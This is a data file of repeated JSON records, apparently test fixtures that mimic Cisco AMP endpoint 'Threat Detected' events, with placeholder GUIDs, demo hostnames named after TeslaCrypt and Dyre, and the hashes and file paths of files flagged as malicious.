-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} 